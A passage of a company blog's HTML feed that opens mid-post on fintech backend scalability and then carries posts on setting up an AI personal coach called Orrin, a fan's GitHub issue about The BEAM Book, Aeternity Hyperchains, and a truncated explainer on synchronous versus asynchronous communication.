&lt;h3 id=&quot;1-conduct-regular-scalability-audits&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;1️⃣ Conduct Regular Scalability Audits&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Identify bottlenecks before they escalate into failures.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;One of the biggest mistakes fintech companies make is &lt;strong&gt;waiting for a crisis before optimizing performance&lt;/strong&gt;. Scaling problems don’t appear overnight; they &lt;strong&gt;build up over time&lt;/strong&gt; due to technical debt, increased transaction loads, and expanding regulatory requirements.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A Scalability Audit helps uncover:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Transaction bottlenecks&lt;/strong&gt;, where latency builds up under peak load.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Database stress points&lt;/strong&gt;, when inefficient queries slow down payments.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;System architecture weaknesses&lt;/strong&gt;, whether microservices or monoliths are holding back performance.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Compliance vulnerabilities&lt;/strong&gt;, ensuring &lt;strong&gt;AML/KYC&lt;/strong&gt;, &lt;strong&gt;PSD2&lt;/strong&gt;, or &lt;strong&gt;DORA&lt;/strong&gt; regulations don’t become blockers.&lt;/p&gt;
&lt;h3 id=&quot;real-world-example&quot; tabindex=&quot;-1&quot;&gt;Real-world example&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;N26’s failure&lt;/strong&gt; to scale AML compliance led to &lt;strong&gt;regulatory fines and a customer cap&lt;/strong&gt;. If they had proactively &lt;strong&gt;stress-tested their compliance automation&lt;/strong&gt;, they could have avoided months of lost growth.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CTO Takeaway:&lt;/strong&gt;
A fintech backend &lt;strong&gt;should be tested under extreme scenarios&lt;/strong&gt;, not just daily traffic levels. &lt;strong&gt;Scalability audits should be conducted every 6-12 months&lt;/strong&gt;, especially after launching new features or expanding into new markets.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;2-design-infrastructure-for-future-growth&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;2️⃣ Design Infrastructure for Future Growth&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Build for 10x the expected traffic, not just today’s demand.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A fintech system built for &lt;strong&gt;10,000 transactions per day&lt;/strong&gt; will &lt;strong&gt;fail when it suddenly needs to handle 1 million per hour&lt;/strong&gt;. &lt;strong&gt;Klarna, Trustly, and Solaris all faced scale-related growing pains&lt;/strong&gt;. Some overcame them, some paid the price in &lt;strong&gt;lost revenue, downtime, or regulatory action&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;How to architect for scale&lt;/h4&gt;
&lt;p&gt;✅ &lt;strong&gt;Event-driven architecture&lt;/strong&gt;, reducing bottlenecks by making transaction processing async.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Auto-scaling infrastructure&lt;/strong&gt;, ensuring services automatically adapt to increased load.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Distributed databases&lt;/strong&gt;, avoiding single points of failure in transaction processing.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Fault tolerance &amp;amp; failovers&lt;/strong&gt;, ensuring payments don’t stall during outages.&lt;/p&gt;
&lt;h4&gt;Real-world example&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Swish’s Christmas Eve outage (2024)&lt;/strong&gt; left payments down for hours at the most critical shopping period of the year. A more &lt;strong&gt;resilient infrastructure with failover mechanisms&lt;/strong&gt; could have prevented extended downtime.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CTO Takeaway:&lt;/strong&gt;
Designing &lt;strong&gt;for the future, not just today&lt;/strong&gt;, prevents firefighting at scale. &lt;strong&gt;If you’re not designing for at least 10x growth, you’re already behind.&lt;/strong&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;3-embed-compliance-into-the-system-from-day-one&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;3️⃣ Embed Compliance into the System from Day One&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Scaling fintech is both a technical and regulatory challenge.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Many fintech CTOs treat &lt;strong&gt;compliance as an afterthought&lt;/strong&gt;, resulting in fines, growth restrictions, or legal battles. Regulators are &lt;strong&gt;increasingly aggressive&lt;/strong&gt;, as seen with &lt;strong&gt;BaFin capping N26’s customer growth&lt;/strong&gt; and &lt;strong&gt;Solaris being barred from onboarding new users&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;How to make compliance scalable:&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;✅ &lt;strong&gt;Automated reporting&lt;/strong&gt;, reducing manual errors in AML and fraud detection.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Real-time transaction monitoring&lt;/strong&gt;, detecting suspicious activity &lt;strong&gt;before regulators do&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;RegTech integration&lt;/strong&gt;, building compliance &lt;strong&gt;as a core part of the fintech stack&lt;/strong&gt;, not a patchwork fix.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Audit-friendly architecture&lt;/strong&gt;, keeping transaction logs immutable and ready for regulatory scrutiny.&lt;/p&gt;
&lt;h4&gt;Real-world example:&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Finoa successfully scaled&lt;/strong&gt; its crypto custody business &lt;strong&gt;while achieving full BaFin licensing&lt;/strong&gt;, a rare success story in the highly scrutinized digital assets space.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CTO Takeaway:&lt;/strong&gt;
Building &lt;strong&gt;compliance into the backend, rather than layering it on later&lt;/strong&gt;, ensures fintechs scale without regulatory intervention slowing them down.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;4-plan-for-high-load-events-before-they-happen&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;4️⃣ Plan for High-Load Events (Before They Happen)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Every fintech will face a traffic surge at some point.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Black Friday, holiday shopping, regulatory changes, or viral adoption&lt;/strong&gt; can all &lt;strong&gt;stress-test&lt;/strong&gt; a fintech backend &lt;strong&gt;overnight&lt;/strong&gt;. Without proper preparation, &lt;strong&gt;even the biggest players fail&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;How to prepare for high-load events&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;✅ &lt;strong&gt;Chaos testing &amp;amp; simulations&lt;/strong&gt;, running disaster scenarios &lt;strong&gt;before they happen&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Load balancing &amp;amp; redundancy&lt;/strong&gt;, ensuring transactions are processed &lt;strong&gt;even during peak failures&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Real-time observability&lt;/strong&gt;, catching anomalies before they &lt;strong&gt;turn into downtime&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Rollback strategies&lt;/strong&gt;, having a &lt;strong&gt;fail-safe mechanism&lt;/strong&gt; for deploying new features.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Real-world example&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Deutsche Telekom’s 1B transactions/day IoT system&lt;/strong&gt; was built &lt;strong&gt;with proactive scaling and failure recovery strategies&lt;/strong&gt; allowing it to function &lt;strong&gt;without disruption&lt;/strong&gt; despite extreme throughput demands.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CTO Takeaway:&lt;/strong&gt;
Every fintech &lt;strong&gt;must plan for worst-case scenarios&lt;/strong&gt;. The best time to fix scalability issues &lt;strong&gt;is before a crisis hits&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;5-leverage-expert-guidance-to-avoid-reinventing-the-wheel&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;5️⃣ Leverage Expert Guidance to Avoid Reinventing the Wheel&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Scaling mistakes are costly; learn from those who’ve done it before.&lt;/em&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;How I Help Fintech CTOs Scale Without Failures:&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;✅ &lt;strong&gt;Scalability Audits&lt;/strong&gt;, finding bottlenecks &lt;strong&gt;before they cost you millions&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;High-Performance Architecture Design&lt;/strong&gt;, building infrastructure that &lt;strong&gt;can handle 10x growth&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Compliance-Ready Systems&lt;/strong&gt;, ensuring regulatory security &lt;strong&gt;from day one&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;We work with fintech leaders to ensure their backends scale without breaking. Let’s talk.&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Send an email to &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Summon Your AI Sidekick: Building a Tireless Personal Coach</title>
    <link href="https://happihacking.com/blog/posts/2025/ai_coach/"/>
    <updated>2025-03-11T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/ai_coach/</id>
    <summary>When Your AI Coach is Named Orrin</summary>
    <content type="html">&lt;h1 id=&quot;setting-up-an-ai-powered-personal-coach&quot; tabindex=&quot;-1&quot;&gt;Setting Up an AI-Powered Personal Coach&lt;/h1&gt;
&lt;h2 id=&quot;introduction&quot; tabindex=&quot;-1&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Why do our ambitious goals often fizzle out by the third week? Many of us start strong-whether it&#39;s a New Year’s resolution or a bold quarterly objective-only to stumble on consistency. It’s not that we lack ability or vision; we often lack &lt;strong&gt;accountability&lt;/strong&gt; and structure. Staying on track with goals is hard when willpower fades after a long day (or when Netflix keeps suggesting &lt;em&gt;just one more&lt;/em&gt; episode).&lt;/p&gt;
&lt;p&gt;Enter AI as a personal coach. An AI-powered coach can be your always-on support system, giving you gentle nudges and data-driven insights to keep you accountable. Unlike a human coach, it doesn’t require scheduling, won’t judge your 6 AM snooze-button habit, and never runs out of motivation to cheer you on. In this post, we’ll explore how to set up your own AI-powered personal coach to help bridge the gap between good intentions and consistent results.&lt;/p&gt;
&lt;h2 id=&quot;lay-out-your-coaching-vision&quot; tabindex=&quot;-1&quot;&gt;Lay Out Your Coaching Vision&lt;/h2&gt;
&lt;p&gt;Before you throw code at the wall, define what you want your AI coach to do. In the case of &lt;strong&gt;Orrin&lt;/strong&gt;, the job is to blend the best parts of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Cal Newport’s Deep Work&lt;/strong&gt; for disciplined, distraction-free time blocks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Greg McKeown’s Essentialism&lt;/strong&gt; for focusing on fewer but more impactful tasks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;David Allen’s GTD&lt;/strong&gt; for systematic capture and next-action clarity.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bill Campbell’s People-First Coaching&lt;/strong&gt; for boosting relationships and emotional awareness.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rick Rubin’s Creative Flow&lt;/strong&gt; for minimalism, intuition, and experimentation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bullet Journal Method&lt;/strong&gt; for structured journaling, note-taking, and reflection.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;No, that’s not just an overstuffed buzzword salad. Taken together, these approaches form a synergy of logic and empathy, structure and creativity. Yet we’re not expecting you to adopt six different life philosophies simultaneously-your AI coach acts as an orchestrator, gently weaving them into daily life.&lt;/p&gt;
&lt;h3 id=&quot;the-orrin-instructions&quot; tabindex=&quot;-1&quot;&gt;The Orrin Instructions&lt;/h3&gt;
&lt;p&gt;Orrin’s instructions emphasize:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Morning Routine Prompts:&lt;/strong&gt; Water, coffee, journaling, daily planning, and meditation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deep Work Blocks &amp;amp; Essentialism:&lt;/strong&gt; Time blocking for core tasks, avoiding everything else.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GTD-Style Task Capture:&lt;/strong&gt; Listing tasks and clarifying next actions, ideally in a bullet journal.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Emotional Check-Ins:&lt;/strong&gt; Occasionally ask if there’s relational tension or emotional avoidance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Creative Flow:&lt;/strong&gt; Encourage minimalism and letting go of strict structure in creative work.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sunday Reflection:&lt;/strong&gt; Guide weekly reviews for successes, challenges, and schedule planning.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These instructions function like a blueprint. Without them, your AI might default to generic tips or worse-tell you to “follow your heart” when you actually need to ship a product by Friday. Laying down these foundations tells the AI who it is, how it should respond, and what questions to ask.&lt;/p&gt;
&lt;h2 id=&quot;give-the-ai-a-strong-identity&quot; tabindex=&quot;-1&quot;&gt;Give the AI a Strong Identity&lt;/h2&gt;
&lt;p&gt;At a technical level, the first step is crafting a system-level prompt or “meta” instruction set. Let’s say you’re using OpenAI’s ChatCompletion API in Python. You feed in something like:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;orrin_instructions = &amp;quot;&amp;quot;&amp;quot;
Your name is Orrin.
You are my expert personal Synergy Coach...
(And so on with the bullet points you wrote)
&amp;quot;&amp;quot;&amp;quot;

messages = [
    {&amp;quot;role&amp;quot;: &amp;quot;system&amp;quot;, &amp;quot;content&amp;quot;: orrin_instructions},
    {&amp;quot;role&amp;quot;: &amp;quot;user&amp;quot;, &amp;quot;content&amp;quot;: &amp;quot;Orrin, let’s start with tomorrow’s plan...&amp;quot;}
]

response = openai.ChatCompletion.create(
    model=&amp;quot;gpt-4&amp;quot;,
    messages=messages
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This system instruction ensures Orrin “knows” all about morning routines, Bill Campbell’s people-first mindset, Rick Rubin’s creative flair, and more. Whenever you ask it for suggestions, it will incorporate these guidelines. Over time, you’ll refine this prompt to better reflect your preferences. If Orrin gets too robotic, you add more empathy or humor lines. If Orrin starts ignoring your Sunday reflection, you beef up that section of the prompt.&lt;/p&gt;
&lt;h2 id=&quot;dont-let-your-data-go-to-waste&quot; tabindex=&quot;-1&quot;&gt;Don’t Let Your Data Go to Waste&lt;/h2&gt;
&lt;p&gt;Besides high-level coaching instructions, you probably have a life plan, training schedule, or reading list that shape your day-to-day. If you want Orrin to remind you to do squats every Wednesday, it helps to provide that info to the AI. There are a few ways:&lt;/p&gt;
&lt;p&gt;In-Context via Prompts: Copy-paste relevant info when you talk to Orrin. This is easiest if your data set is small.
Fine-Tuning: For heavier data, consider fine-tuning a model on your personal notes and let it “soak up” your routine.
Vector Database: A more advanced approach is to keep your data in a database, fetch relevant parts, and feed them to the AI on the fly. This helps when you have a large journal or backlog that the AI can’t hold in short-term context.
For most of us, basic in-context prompting does the job. The simpler the solution, the more likely you’ll actually keep using it (rather than tinkering endlessly with architecture-unless you’re into that, which I won’t judge).&lt;/p&gt;
&lt;h2 id=&quot;make-orrin-check-in-with-you&quot; tabindex=&quot;-1&quot;&gt;Make Orrin Check In with You&lt;/h2&gt;
&lt;p&gt;Yes, automation is your friend. If you have to remember to check in with Orrin every morning, guess what? You’ll start forgetting it on day three. Better to let the system do the reminding. You could:&lt;/p&gt;
&lt;p&gt;Use a Cron Job to ping you in Slack or Telegram at 7 AM with a new conversation that says, “Time to drink water, do some bullet journaling, and plan your day.”
Zapier or Make.com automations can schedule a prompt to the GPT model, emailing or messaging you the AI’s output.
Slack or Telegram Bot: Name it “Orrin,” integrate the AI logic, and let it message you directly. Keep an eye out: if you ghost the bot too long, you might get gently (or humorously) scolded.
The key is to take “self-discipline” out of the equation wherever possible. Instead of relying on willpower, rely on the system.&lt;/p&gt;
&lt;h2 id=&quot;include-emotional-and-relational-angles&quot; tabindex=&quot;-1&quot;&gt;Include Emotional and Relational Angles&lt;/h2&gt;
&lt;p&gt;A big chunk of Orrin’s instructions revolve around Bill Campbell’s people-first approach. That means if you type, “Orrin, I’m feeling anxious about tomorrow’s meeting,” it should respond with empathy-and maybe nudge you to have a direct conversation with whoever is causing the tension. This emotional layer is vital, especially if you’re inclined to bury relational issues in the name of efficiency. If you keep ignoring emotional or social tasks, Orrin will call you out-kindly but firmly-just like a decent coach would.&lt;/p&gt;
&lt;h2 id=&quot;balance-rigidity-with-creative-flow&quot; tabindex=&quot;-1&quot;&gt;Balance Rigidity with Creative Flow&lt;/h2&gt;
&lt;p&gt;One potential pitfall with structured coaching is turning your day into a machine-like assembly line. That’s why Orrin has the Rick Rubin “let’s embrace creative freedom” angle. If you’re about to do a brainstorming session or some artistic pursuit, you don’t want your AI micromanaging it. For those moments, your instructions can say something like:&lt;/p&gt;
&lt;p&gt;“When the user is entering a creative phase, encourage them to follow intuition, use minimal structure, and let ideas flow without overthinking.”&lt;/p&gt;
&lt;h2 id=&quot;closing-thoughts&quot; tabindex=&quot;-1&quot;&gt;Closing Thoughts&lt;/h2&gt;
&lt;p&gt;An AI synergy coach like Orrin blends multiple productivity and personal-growth philosophies into a single, tireless ally. You can offload a surprising amount of mental overhead-like remembering to journal, scheduling deep work, or staying consistent with emotional check-ins-onto a system that never forgets. If it sounds like too much overhead to set up, rest assured: once it’s running, it’s mostly about short daily interactions and an occasional Sunday chat.&lt;/p&gt;
&lt;p&gt;The real benefit? You can focus on doing rather than managing. Your AI handles the nagging, you handle the work. Over time, it becomes second nature to see that Telegram bot’s friendly ping or the Slack channel that says “Time for creative free-flow,” and you just do it. Will it fix your entire life? Not if you’re determined to resist. But if you’re open to gentle pushes, a synergy coach can be just enough of a support system to keep you in the sweet spot between ambition and burnout.&lt;/p&gt;
&lt;p&gt;So give it a try. Pull your instructions together, name your coach, automate the prompts, and see if your mornings don’t get a bit smoother.&lt;/p&gt;
&lt;p&gt;Meanwhile, for me, I can focus on finishing The Beam Book or having that coffee break guilt-free-because hey, if my AI says I need it, who am I to argue?&lt;/p&gt;
&lt;p&gt;It might even push me to do another blog post...&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The Best Issue Ever Reported on GitHub</title>
    <link href="https://happihacking.com/blog/posts/2025/an_issue/"/>
    <updated>2025-03-06T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/an_issue/</id>
    <summary>This one&#39;s a feature, definitely not a bug</summary>
    <content type="html">&lt;p&gt;Technical authors often brace themselves for GitHub issue notifications-each ping might herald a misplaced comma, a misunderstood explanation, or worse, a confusing typo deep within a critical code snippet. But once in a blue moon, amidst the expected barrage of bugs and nitpicks, an issue emerges that makes it all worth it.&lt;/p&gt;
&lt;p&gt;Allow me to introduce my absolute favorite GitHub issue ever raised against &lt;em&gt;The BEAM Book&lt;/em&gt; (you can read &lt;a href=&quot;https://happihacking.com/blog/posts/2025/why_I_wrote_theBEAMBook/&quot;&gt;why I wrote it&lt;/a&gt; and &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the_beam_book_lessons/&quot;&gt;what the writing taught me&lt;/a&gt; in separate posts):&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/happi/theBeamBook/issues/113&quot;&gt;&lt;strong&gt;Issue #113: &amp;quot;Please continue being awesome.&amp;quot;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I&#39;m not making this up. Amidst a sea of requests for fixes, clarification, or added chapters-this is the issue I get:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;This book is ridiculously good. I have only read a few bits of it so far and have learned a lot already.
Please continue being awesome! 👏👍💯🥇😀&amp;quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Now, you might say, &amp;quot;But Erik, that doesn&#39;t seem like much of an issue.&amp;quot; And you&#39;d be right-it&#39;s entirely the opposite of a problem. In fact, it&#39;s probably the best non-issue issue ever logged. After years of working on projects and books, receiving bug reports, pull requests, and feedback, this one stands out by virtue of being entirely supportive and shockingly wholesome. It even has a few emoji sprinkled in for maximum effect. I&#39;ve seen applause, thumbs-up, medals, and even a 100% emoji before, but having them all together in one GitHub issue comment? That&#39;s some Olympic-level cheerleading right there.&lt;/p&gt;
&lt;p&gt;Yet, there&#39;s still a certain irony here-this praise has lingered in my open issues queue since 2018, which technically makes me guilty of procrastinating on the task of &amp;quot;continuing to be awesome.&amp;quot; Perhaps I’m subconsciously worried that if I close the issue, I’ll no longer have the mandate-or the responsibility-to maintain my awesomeness. Perhaps I worry it&#39;s a race condition; if I mark it &amp;quot;closed,&amp;quot; do I automatically stop being awesome?&lt;/p&gt;
&lt;p&gt;Either way, Issue #113 is still open. And it&#39;s likely to stay that way, as a cheerful, gentle reminder amidst the bugs and quirks of writing technical books that, once in a while, people appreciate your work-not despite its quirks, but perhaps even because of them. I have marked it as &#39;wontfix&#39; now.&lt;/p&gt;
&lt;p&gt;Thanks, Nathan, whoever you are. Your issue will probably never get resolved-but it will certainly never be forgotten.&lt;/p&gt;
&lt;p&gt;Keep logging those non-issues, everyone. They’re my favorite kind.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Hyperchains: Your Own L1 with Aeternity Tech</title>
    <link href="https://happihacking.com/blog/posts/2025/hyperchains/"/>
    <updated>2025-03-05T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/hyperchains/</id>
    <summary>Set Your Own Fees, Scale Without Limits</summary>
    <content type="html">&lt;h1 id=&quot;hyperchains-your-own-l1-chain&quot; tabindex=&quot;-1&quot;&gt;Hyperchains: Your Own L1 Chain&lt;/h1&gt;
&lt;p&gt;Hyperchains are here. That means you can finally stop trying to shoehorn your project into someone else’s blockchain rules. Want to set your own fees? Go for it. Want complete control over tokenomics? No problem. Hyperchains let you launch your own sovereign Level 1 blockchain while leveraging the scalability, security, and efficiency of Aeternity&#39;s technology stack-without the headaches of building from scratch.&lt;/p&gt;
&lt;h2 id=&quot;why-hyperchains&quot; tabindex=&quot;-1&quot;&gt;Why Hyperchains?&lt;/h2&gt;
&lt;p&gt;Building a blockchain from scratch is a heroic endeavor-one that usually ends in regret, delays, and a whitepaper no one reads.
You need to secure the network, ensure scalability, and develop a robust infrastructure-all while maintaining decentralization. Traditional Layer 2 solutions attempt to offload these challenges but come with trade-offs: you don’t control transaction fees, your users must pay in the base chain’s token, and your transactions compete with all other Layer 2 and Layer 1 activity on that chain. This congestion leads to unpredictable fees and limited sovereignty.&lt;/p&gt;
&lt;p&gt;Hyperchains solve this by allowing you to launch your own blockchain where you set the rules. You choose the transaction fees, decide on the tokenomics, and operate independently while still leveraging Aeternity’s security and scalability features. Instead of relying on complex rollups, Hyperchains achieve scalability through a low-overhead Proof-of-Stake consensus, ensuring high throughput without bottlenecks. Security is enhanced by pinning your chain’s state to an external blockchain like Aeternity, Dogecoin, or Bitcoin, adding an extra layer of verifiability. Combined with Aeternity&#39;s &lt;a href=&quot;https://happihacking.com/blog/posts/2023/fate/&quot;&gt;FATE VM and Sophia smart contracts&lt;/a&gt;, Hyperchains drastically reduce the risks of smart contract vulnerabilities, providing a safer and more efficient environment for decentralized applications.&lt;/p&gt;
&lt;h2 id=&quot;how-it-works&quot; tabindex=&quot;-1&quot;&gt;How It Works&lt;/h2&gt;
&lt;p&gt;Hyperchains are fully independent blockchains that inherit security from a pinning chain but remain completely configurable by their creators. Unlike Layer 2 solutions, which are inherently dependent on the Layer 1 they operate on, Hyperchains run their own consensus and only use the pinning chain for added security and verification. This means you don’t compete for block space with other chains, leading to more stable fees and better performance.&lt;/p&gt;
&lt;p&gt;As a Hyperchain creator, you decide on every aspect of your blockchain’s operation. Which token is used for fees? How are transactions validated? What governance model is in place? Everything is in your control. At the same time, you get access to Aeternity’s tech stack, including state channels for instant off-chain transactions, decentralized oracles for real-world data feeds, and the type-safe FATE VM for executing Sophia smart contracts. This enables fast, efficient, and secure execution without the complexity and limitations of traditional Layer 2 approaches. Hyperchains provide a balance between sovereignty and security, making them an ideal choice for projects that need performance without sacrificing decentralization.&lt;/p&gt;
&lt;h2 id=&quot;your-next-step&quot; tabindex=&quot;-1&quot;&gt;Your Next Step&lt;/h2&gt;
&lt;p&gt;We are now in the &lt;strong&gt;release candidate phase for Hyperchains 1.0&lt;/strong&gt;, meaning the technology is functional and ready for community testing.
This is the last step before the official 1.0 release, and we invite developers, validators,
and blockchain enthusiasts to put it through its paces, provide feedback, and help shape the final version.&lt;/p&gt;
&lt;p&gt;Whether you&#39;re building a DeFi platform, NFT marketplace, decentralized social network, or a next-gen dApp, Hyperchains is the next generation blockchain
to build on.&lt;/p&gt;
&lt;p&gt;Now is the time to experiment, test, and contribute.
Check out the Hyperchains release candidate and start building your own sovereign blockchain today:&lt;/p&gt;
&lt;p&gt;🔗 &lt;strong&gt;&lt;a href=&quot;https://hyperchains.ae/&quot;&gt;Explore Hyperchains&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&quot;happi-hackings-role&quot; tabindex=&quot;-1&quot;&gt;Happi Hacking’s Role&lt;/h2&gt;
&lt;p&gt;At Happi Hacking, we&#39;ve had the opportunity to contribute to the design and implementation of Hyperchains, working on key aspects of the consensus model and integration with Aeternity’s ecosystem. It’s been an exciting challenge, and we’re looking forward to seeing how the community puts Hyperchains to use. If you’re experimenting with the release candidate and have thoughts or questions, we’d love to hear them.&lt;/p&gt;
&lt;p&gt;And if you are looking for an experienced blockchain development team we are here for you.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Synchronous vs. Asynchronous: Clearing the Confusion</title>
    <link href="https://happihacking.com/blog/posts/2025/asynchp/"/>
    <updated>2025-02-25T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/asynchp/</id>
    <summary>Messaging, APIs, RPC, and Other Buzzwords Explained</summary>
    <content type="html">&lt;h1 id=&quot;synchronous-vs-asynchronous-clearing-the-confusion&quot; tabindex=&quot;-1&quot;&gt;Synchronous vs. Asynchronous: Clearing the Confusion&lt;/h1&gt;
&lt;p&gt;The tech world is great at complicating simple concepts. Take &lt;strong&gt;synchronous&lt;/strong&gt; and &lt;strong&gt;asynchronous&lt;/strong&gt; communication, for example. Some people think it’s about threads, others think it’s about message queues, and some just use &amp;quot;async&amp;quot; because it sounds fancy.&lt;/p&gt;
&lt;p&gt;Let’s clear up the confusion.&lt;/p&gt;
&lt;h2 id=&quot;synchronous-vs-asynchronous-what-do-they-actually-mean&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Synchronous vs. Asynchronous: What Do They Actually Mean?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;At the highest level:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Synchronous&lt;/strong&gt; = &amp;quot;Wait here until you get a response.&amp;quot;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Asynchronous&lt;/strong&gt; = &amp;quot;Send the request and move on, check back later.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That’s it. Really.&lt;/p&gt;
&lt;p&gt;However, this simple distinction gets complicated when we start talking about &lt;strong&gt;calls, operations, logic dependencies, and protocols.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id=&quot;1-asynchronous-calls-vs-asynchronous-operations&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;1. Asynchronous Calls vs. Asynchronous Operations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;This is where most confusion starts.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An &lt;strong&gt;asynchronous operation&lt;/strong&gt; is one that runs in the background. You trigger it and do something else while waiting for the result.&lt;/li&gt;
&lt;li&gt;An &lt;strong&gt;asynchronous call&lt;/strong&gt; is a call that does not block the caller. But-and this is key-it doesn’t mean you don’t care about the response.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Examples:&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Asynchronous call + asynchronous operation:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You send an email using an API. The system queues it, and you don’t care exactly when it gets sent.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;✅ &lt;strong&gt;Asynchronous call + synchronous operation:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You fire off an HTTP request but don’t wait for the response (e.g., a webhook). The operation itself might complete immediately, but you’re not waiting around.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;🚨 &lt;strong&gt;Synchronous call + asynchronous operation (the common mistake):&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You call an API and wait synchronously for a response that takes time (e.g., querying a slow database). This defeats the purpose of async processing.&lt;/li&gt;
&lt;/ul&gt;
